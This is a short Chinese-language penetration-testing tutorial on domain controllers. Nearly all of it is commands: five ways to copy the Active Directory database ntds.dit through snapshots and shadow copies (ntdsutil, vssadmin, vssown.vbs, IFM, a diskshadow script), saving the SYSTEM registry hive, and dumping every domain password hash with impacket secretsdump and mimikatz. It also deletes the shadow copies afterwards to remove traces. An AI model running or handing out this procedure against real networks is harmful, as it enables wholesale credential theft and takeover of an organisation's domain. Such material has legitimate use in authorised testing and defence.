内网渗透：域控制器安全

作者 小苏

提取ntds.dit：

ntds.dit作用：

保存了所有目录活动数据，可以破译进行hash获取制作票据

方法一：通过ntdsutil.exe提取ntds.dit

指令：

ntdsutil snapshot “activate instance ntds” create quit quit

1.创建快照保存其中GUID值

{351d4f2c-7eed-431c-be9a-33f60df84733}

2.加载快照

指令：

ntdsutil snapshot “mount {351d4f2c-7eed-431c-be9a-33f60df84733}” quit quit

这一步可以看到被加载到哪一个目录下

3.将ntds.dit复制出来

指令：

copy C:\\$SNAP_202201071706_VOLUMEC$\\Windows\\NTDS\\ntds.dit C:\\Users\\liukaifeng01\\Desktop

5.确认删除，提裤子

ntdsutil snapshot “List All” quit quit

方法二：vssadmin提取ntds.dit

1.创建c盘卷影拷贝

指令：

vssadmin create shadow /for=c:

2.在创建的卷影里将ntds.dit复制出来

指令：

copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy11\\windows\\NTDS\\ntds.dit c:\\ntds.dit

3.删除创建的卷影

指令：

vssadmin delete shadows /for=c: /quiet

方法三：利用 vssown.vbs脚本提取

1.启动拷贝卷影的服务

cscript vssown.vbs /start

2.创建c盘卷影

cscript vssown.vbs /create c

3.列出当前的拷贝卷影

cscript vssown.vbs /list

4.拷贝出文件

copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy7\\windows\\NTDS\\ntds.dit c:\\ntds.dit

5.删除卷影

cscript vssown.vbs /delete {3D20A65B-9BF8-426A-A15A-92BC04879EF7}//GUID

方法四： 利用ntdsutil IFM功能创建卷影拷贝

1.创建IFM媒体

指令：

ntdsutil “ac i ntds” “ifm” “create full c:/test” q q

2.将ntds.dit和system复制到目录下

指令：

dir “c:\\test\\Active Directory”
dir “c:\\test\\registry”

3.复制出ntds文件删除test文件夹

指令：

rmdir /s /q test

4.可以利用nishang的脚本进行复制

指令：

Import-Module .\\Copy-VSS.ps1
Copy-vss

方法五：diskshadow导出ntds.dit文件

这是微软自带的软件，可以执行txt里的指令

指令：

diskshadow /s c:\\1.txt

TXT内容：

set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% k:
exec “cmd.exe” /c copy K:\\Windows\\NTDS\\ntds.dit c:\\ntds.dit
delete shadows all
list shadows all
reset
exit

再将system.hive提取

reg save hklm\\system c:\\windows\\temp\\system.hive

导出ntds.dit的散列值：

方法一：使用 impacket包导出

前提：导出ntds.dit必须要有system文件

指令：

impacket-secretsdump -system SYSTEM -ntds ntds.dit LOCAL

方法二：mimikatz获取域散列值

指令：

privilege::debug
lsadump::lsa /inject